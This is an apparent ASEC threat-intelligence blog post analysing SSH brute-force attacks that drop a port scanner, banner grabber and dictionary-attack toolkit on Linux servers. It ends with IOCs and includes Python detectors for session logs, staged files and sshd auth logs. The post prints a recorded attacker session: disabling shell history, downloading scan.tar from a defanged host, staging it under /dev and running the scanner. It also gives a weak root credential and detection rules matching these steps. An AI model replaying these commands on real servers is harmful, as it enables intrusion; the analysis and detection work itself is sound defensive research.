Analysis of Attacks That Install Scanners on Linux SSH Servers – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) analyzes attack campaigns against poorly managed Linux SSH servers and shares the results on the ASEC Blog. Before installing malware such as DDoS bots and CoinMiners, threat actors need to obtain information on the attack target, namely its IP address and SSH account credentials. They scan IP ranges for servers with the SSH service (port 22) enabled, then launch a brute force or dictionary attack against those servers to obtain a valid ID and password.

The more CoinMiners threat actors control, the more cryptocurrency they can mine, and the more DDoS bots they control, the more powerful the DDoS attacks they can launch. To install more CoinMiners and DDoS bots, however, they must obtain as many account credentials from target systems as possible.

Thus, besides DDoS bots and CoinMiners, threat actors can also install malware that performs this scanning and brute force or dictionary attacks from infected systems, which lets them compromise further vulnerable systems. Threat actors can also choose to install only scanners and sell the breached IP addresses and account credentials on the dark web.

In conclusion, there are cases where SSH scanner malware is installed on poorly managed SSH servers alongside DDoS bots and CoinMiners. This post provides an analysis of attack cases in which such malware was installed.

1. Malware Targeting Linux SSH Servers

Common malware installed in attacks against poorly managed Linux SSH servers includes ShellBot [1] [2], Tsunami [3], ChinaZ DDoS Bot [4], and XMRig CoinMiner [5]. Various other known malware is also used in attacks. AhnLab TIP provides quarterly statistics on attacks and malware.

Figure 1. Classification of malware targeting Linux SSH servers in Q3 2023

Before installing malware, threat actors use an ID and password list such as the one shown below to attempt to log into Linux servers with the SSH service enabled, and install the malware when an attempt succeeds. The recently identified threat actor installed scanners instead of other malware after obtaining account credentials, which is believed to be for the purpose of procuring more vulnerable systems.

Figure 2. ID and password list used in a past Tsunami DDoS bot attack campaign

2. SSH Brute Force Attack Campaign

The threat actor used a scanner to find systems with port 22 (the SSH service) open and then used account credentials obtained with an SSH dictionary attack tool to install malware. The ID, password, and source IP address used in the attack are as follows.

User   Password       Attacker IP
root   Password1234   217.156.4[.]2
Table 1. Threat actor’s IP address and account credentials used in the attacks

After a successful login, the threat actor first executed the following command to check the total number of CPU cores. This is the command that the SSH dictionary attack tool “prg” executes after a successful login; more details on this are given further on.

> grep -c ^processor /proc/cpuinfo

The execution of this command signifies that the threat actor had obtained the account credentials. Afterward, the threat actor logged in again using the same credentials and downloaded a compressed file containing a port scanner and an SSH dictionary attack tool. Mistyped commands entered by the threat actor can also be seen, such as “cd /ev/network” and “unaem 0a”.

> unset HISTFILE
> w
> ls -a
> ps ax
> wget 58.216.207[.]82/scan.tar
> ls -a
> mdkri /dev/network
> mkdir /dev/network
> mv scan.tar /dev/network
> cd /ev/network
> cd /dev/network
> ls -a
> unaem 0a
> uname -a
> tar -xvf scan.tar
> cd .stx/
> ls -a
> ./go 212
> cd ..
> ls -a
> rm -rf scan.tar
> ls -a
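A defender reviewing a honeypot or session-recording log can match the indicators in the sequence above mechanically. The following is an added example, not code from the ASEC post or from the attacker’s toolkit, that scores a session transcript against a small set of rules derived from the commands shown: disabling shell history, downloading an archive, staging files under /dev, entering a hidden directory, launching a script named go/gob/rand, and the CPU-core probe. The rule names, weights and alert threshold are my own assumptions; the sample transcript is constructed and uses an RFC 5737 documentation address in place of the defanged download host.

```python
import re

# Constructed sample of an SSH session command log, modelled on the command
# sequence in the report (download host replaced by a documentation address).
SAMPLE_SESSION = """\
unset HISTFILE
w
ls -a
ps ax
wget 203.0.113.10/scan.tar
mkdir /dev/network
mv scan.tar /dev/network
cd /dev/network
uname -a
tar -xvf scan.tar
cd .stx/
./go 212
rm -rf scan.tar
"""

# Each rule: (name, compiled regex, weight). The weights and names are an
# assumed scoring scheme for this example, not a published standard.
RULES = [
    ("history_disabled", re.compile(r"^\s*unset\s+HISTFILE\b"), 3),
    ("cpu_count_probe", re.compile(r"grep\s+-c\s+\^?processor\s+/proc/cpuinfo"), 2),
    ("archive_download", re.compile(r"^\s*(wget|curl)\b.*\.(tar|tgz|tar\.gz)\b"), 2),
    ("dir_under_dev", re.compile(r"^\s*mkdir\s+(-p\s+)?/dev/\S+"), 3),
    ("write_into_dev", re.compile(r"^\s*(mv|cp)\s+\S+\s+/dev/\S+"), 2),
    ("hidden_dir_enter", re.compile(r"^\s*cd\s+\.[^./]\S*"), 1),
    ("scanner_launch", re.compile(r"^\s*\./(go|gob|rand)\b(\s+\d{1,3}){0,2}\s*$"), 3),
    ("cleanup", re.compile(r"^\s*rm\s+-rf\s+\S*\.tar\b"), 1),
]


def analyse_session(text, threshold=6):
    """Score a session transcript line by line.

    Returns (score, findings, flagged) where findings is a list of
    (line_number, rule_name, command) and flagged is True when the
    accumulated score reaches the threshold.
    """
    findings = []
    score = 0
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern, weight in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
                score += weight
    return score, findings, score >= threshold


if __name__ == "__main__":
    score, findings, flagged = analyse_session(SAMPLE_SESSION)
    print(f"score={score} flagged={flagged}")
    for lineno, name, cmd in findings:
        print(f"  line {lineno:>2} {name:<18} {cmd}")
    # A lone CPU-core probe (the first session in the report) scores below the
    # threshold on its own but is still recorded as a finding.
    print(analyse_session("grep -c ^processor /proc/cpuinfo\n"))
```

The CPU-core probe on its own is deliberately kept below the alert threshold: it also appears in benign administration, so it is the combination with history disabling and staging under /dev that makes the session distinctive.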

3. Analysis of Malware Used in Attack

Filename   Description
go         Scanner script (class A IP range)
gob        Scanner script (class B IP range)
rand       Scanner script (runs gob on a random class B IP range)
ps         Port scanner
ps2        Port scanner
b          Banner grabber
prg        SSH brute force tool
Table 2. List of malware used in the attack

The threat actor executed a Bash script named “go” with the argument “212”. The “go” script launches the port scanner, banner grabber, and SSH dictionary attack tool in that order.

Figure 3. Scanner script “go”

When the port scanner is launched, the IP range and port number to scan must be given as arguments. The port number is set to 22 (SSH), and the value passed to the script is used as the class A IP range.

Figure 4. Main execution routine

The “gob” script is similar to the “go” script, the difference being that a class B IP range is given as the argument. While the threat actor manually designated a class A range and executed the “go” script, they could instead have designated a class B range and executed the “gob” script, or executed the “rand” script. The “rand” script differs from “gob” in that it selects an arbitrary class B range upon execution.

Either “ps” or “ps2” is used as the port scanner; both are given an IP range and a port number to scan. Notably, when a system with the target port open is found, the results, that is the list of IP addresses, are saved to a file named “bios.txt” in the same path.

Figure 5. How port scanners are used (ps and ps2)

Next, “b” is executed with three arguments: the “bios.txt” file containing the list of IP addresses created in the previous step, the port number, and the number of scanning threads. The banner grabber “b” connects to each IP address on the given port to grab its banner and writes the results to a file named “banner.log” in the same path. The “go” script then extracts from this file the list of IPs whose banner contains the string “SSH-2.0-OpenSSH” and saves them to a file named “ips.lst”.

The last tool to be executed, “prg”, is an SSH dictionary attack tool. It reads the target IP addresses for the brute force attack from the file “ips.lst” and the ID and password list for the dictionary attack from the file “pass.lst”. The file “ips.lst” holds the IPs obtained through the scanning steps so far, while “pass.lst” is shipped inside the “scan.tar” archive. When a dictionary attack login succeeds, the result is saved to a file named “ssh_vuln”.

Figure 6. Files created as a result of an SSH dictionary attack

After logging in through the dictionary attack, the “prg” tool executes the “grep -c ^processor /proc/cpuinfo” command to determine the total number of CPU cores and displays it in the Nproc entry as shown below. This is the same command that was executed first in the session above. It is therefore deemed that after the threat actor used these same tools to scan and obtain account credentials, they logged in to the target system and installed the same scanner and SSH dictionary attack tools.

Figure 7. Results shown after successful dictionary attack
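Because every stage of the toolkit writes its results next to the binaries (“bios.txt”, “banner.log”, “ips.lst”, “pass.lst”, “ssh_vuln”), the file cluster is a usable host-based indicator, and so is a plain directory such as “/dev/network” under a mount that should hold only device nodes. The following is an added example of such a check; it is not code from the ASEC post or the project it describes. It builds a constructed temporary tree that imitates the layout seen in this attack, walks it for directories holding several toolkit names, and lists non-device subdirectories under the tree’s “dev”. The allow-list of expected /dev subdirectories and the minimum hit count are my own assumptions and should be tuned per distribution.

```python
import os
import shutil
import tempfile

# Names used by the toolkit described in the report.
TOOL_NAMES = {"go", "gob", "rand", "ps", "ps2", "b", "prg"}
OUTPUT_NAMES = {"bios.txt", "banner.log", "ips.lst", "pass.lst", "ssh_vuln"}

# Subdirectories that commonly exist under /dev on Linux. This allow-list is
# an assumption for the example; extend it for your own distribution.
KNOWN_DEV_DIRS = {
    "pts", "shm", "mqueue", "hugepages", "disk", "block", "char", "input",
    "net", "mapper", "cpu", "bus", "snd", "dri", "vfio", "bsg", "usb", "v4l",
}


def build_sample_tree():
    """Create a constructed directory layout mimicking the one in this attack:
    <root>/dev/network/.stx holding the toolkit and its output files, plus a
    couple of normal /dev subdirectories and a benign home directory.
    Returns the temporary root path (caller removes it)."""
    root = tempfile.mkdtemp(prefix="sshscan-demo-")
    for d in ("dev/pts", "dev/shm", "dev/network/.stx", "home/user"):
        os.makedirs(os.path.join(root, d))
    stx = os.path.join(root, "dev", "network", ".stx")
    for name in TOOL_NAMES | OUTPUT_NAMES:
        with open(os.path.join(stx, name), "w") as fh:
            fh.write("constructed placeholder\n")
    # A lone file called "b" in a home directory must not trigger by itself.
    with open(os.path.join(root, "home", "user", "b"), "w") as fh:
        fh.write("notes\n")
    return root


def scan_tree(root, min_hits=3):
    """Walk root and return [(relative_dir, tools, outputs)] for every
    directory containing at least min_hits distinct toolkit file names."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        names = set(filenames)
        tools = sorted(names & TOOL_NAMES)
        outputs = sorted(names & OUTPUT_NAMES)
        if len(tools) + len(outputs) >= min_hits:
            hits.append((os.path.relpath(dirpath, root), tools, outputs))
    return hits


def unexpected_dev_dirs(root):
    """Return plain directories directly under <root>/dev that are not on the
    allow-list. Device nodes and symlinks are ignored; only real directories
    (where an attacker can stage files) are reported."""
    dev = os.path.join(root, "dev")
    found = []
    for entry in sorted(os.listdir(dev)):
        path = os.path.join(dev, entry)
        if os.path.isdir(path) and not os.path.islink(path) and entry not in KNOWN_DEV_DIRS:
            found.append(entry)
    return found


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for rel, tools, outputs in scan_tree(root):
            print(f"toolkit cluster in {rel}: tools={tools} outputs={outputs}")
        print("unexpected dirs under dev:", unexpected_dev_dirs(root))
    finally:
        shutil.rmtree(root)
```

To run the same logic against a live host, call scan_tree("/") with a root of "/" (the relative paths then match absolute ones) and unexpected_dev_dirs("/"). Note that /dev is normally a devtmpfs, so files staged there do not survive a reboot; a clean /dev after a restart does not mean the host was never touched, and the running process list and the SSH authentication log should be checked as well.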

4. Past Attack Cases

Files within the “scan.tar” archive used in the attacks, such as the port scanner and the SSH dictionary attack tool, have also been used by various threat actors before. While each threat actor uses slightly different tools and files, such as the list of account credentials, the attack flows are almost the same.

Figure 8. Tools used in past attacks

These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before use. A report released by the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) in 2021 likewise mentions a threat actor who installed the XMRig CoinMiner together with a port scanner and an SSH dictionary attack tool; tools created by the PRG old Team were used in that case as well. [6]

Figure 9. go scripts used in attacks

5. Conclusion

Recently, threat actors have been installing port scanners and SSH dictionary attack tools on poorly managed Linux SSH servers. Threat actors use these tools to procure more SSH servers, on which they can then install additional malware such as DDoS bots and CoinMiners.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect Linux servers from brute force and dictionary attacks, and apply the latest patches to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access by threat actors. Finally, V3 should be updated to the latest version to block malware infections in advance.
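The dictionary attack described in this post leaves a recognisable trail in the sshd log: a burst of “Failed password” lines from one source, possibly followed by an “Accepted password” for the same source, which is the moment the credentials were obtained. The following is an added example, not code from the ASEC post, that parses syslog-format sshd lines, flags sources that reach a failure count within a time window, marks whether a password login from that source succeeded afterwards, and emits firewall deny rules for the flagged sources. The log excerpt is constructed and uses RFC 5737 documentation addresses rather than the attacker IP from the report; the threshold, window and iptables rule shape are my own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt in syslog format (no year in the timestamp).
SAMPLE_AUTH_LOG = """\
Dec 14 03:10:01 host sshd[2101]: Failed password for root from 203.0.113.10 port 40122 ssh2
Dec 14 03:10:03 host sshd[2103]: Failed password for root from 203.0.113.10 port 40130 ssh2
Dec 14 03:10:04 host sshd[2105]: Failed password for invalid user admin from 203.0.113.10 port 40138 ssh2
Dec 14 03:10:06 host sshd[2107]: Failed password for root from 203.0.113.10 port 40142 ssh2
Dec 14 03:10:08 host sshd[2109]: Failed password for root from 203.0.113.10 port 40150 ssh2
Dec 14 03:10:09 host sshd[2111]: Accepted password for root from 203.0.113.10 port 40158 ssh2
Dec 14 03:12:30 host sshd[2150]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Dec 14 03:12:45 host sshd[2152]: Accepted publickey for alice from 198.51.100.7 port 51004 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_line(line, year=2023):
    """Parse one sshd authentication line; return a dict or None.
    Syslog timestamps carry no year, so one is supplied by the caller."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, max_failures=5, window_seconds=60):
    """Return {ip: {"failures", "users", "compromised"}} for every source
    that produced max_failures password failures inside window_seconds.
    compromised is True when a password login from that source was accepted
    at or after its first failure (the sign that the guessing succeeded)."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["result"] == "Failed"]
        # Sliding window over the (chronological) failure timestamps.
        burst = any(
            (failures[i + max_failures - 1]["ts"] - failures[i]["ts"]).total_seconds() <= window_seconds
            for i in range(len(failures) - max_failures + 1)
        )
        if not burst:
            continue
        first_fail = failures[0]["ts"]
        compromised = any(
            e["result"] == "Accepted" and e["method"] == "password" and e["ts"] >= first_fail
            for e in evs
        )
        alerts[ip] = {
            "failures": len(failures),
            "users": sorted({e["user"] for e in failures}),
            "compromised": compromised,
        }
    return alerts


def deny_rules(alerts):
    """Build iptables commands that drop SSH traffic from each flagged source.
    Returned as strings for review; nothing is executed here."""
    return [f"iptables -I INPUT -s {ip} -p tcp --dport 22 -j DROP" for ip in sorted(alerts)]


if __name__ == "__main__":
    found = detect_bruteforce(SAMPLE_AUTH_LOG)
    for ip, info in found.items():
        print(ip, info)
    for rule in deny_rules(found):
        print(rule)
```

Feed it the contents of /var/log/auth.log, /var/log/secure, or the output of journalctl for the SSH unit (the unit name differs between distributions). A source marked compromised is the case this post describes: the failures are the dictionary attack, and the accepted password is the login after which the scanner toolkit is dropped, so that host should be treated as breached rather than merely probed.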

ASEC uses a Linux SSH Honeypot to collect these attack source addresses in real time. The identified attack source addresses are provided through AhnLab TIP.

Figure 10. Threat IOCs page on AhnLab TIP

File Detection
– Trojan/Shell.Scanner.SC195356 (2023.12.14.03)
– Trojan/Shell.Scanner.SC195357 (2023.12.14.03)
– Trojan/Shell.Scanner.SC195396 (2023.12.15.03)
– HackTool/Linux.Sshbrute.2121276 (2023.12.14.03)
– HackTool/Linux.Scanner.673120 (2020.04.07.08)
– HackTool/Linux.Portscan.SE157 (2020.04.21.00)
– HackTool/Linux.Scanner.458020 (2023.12.14.03)

IOC
MD5

– db1fd9c0ccc6aea1176d219ff5d7fd01 : Scanner Bash Script (go)
– 6fe6cc7c88cf1a0c20727a03d2577c04 : Scanner Bash Script (gob)
– 03b23be96901764867da50dcd48c96dd : Scanner Bash Script (rand)
– edc91faa16aa3e5b3d7303b2a276d23d : Port Scanner (ps)
– 946689ba1b22d457be06d95731fcbcac : Port Scanner (ps2)
– 45901e5b336fd0eb79c6decb8e9a69cb : Banner Grabber (b)
– dfa3dcb5b825f5622e54bd09be73b6ed : SSH Bruteforcer (prg)

Download
– hxxp://58.216.207[.]82/scan.tar

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/59972/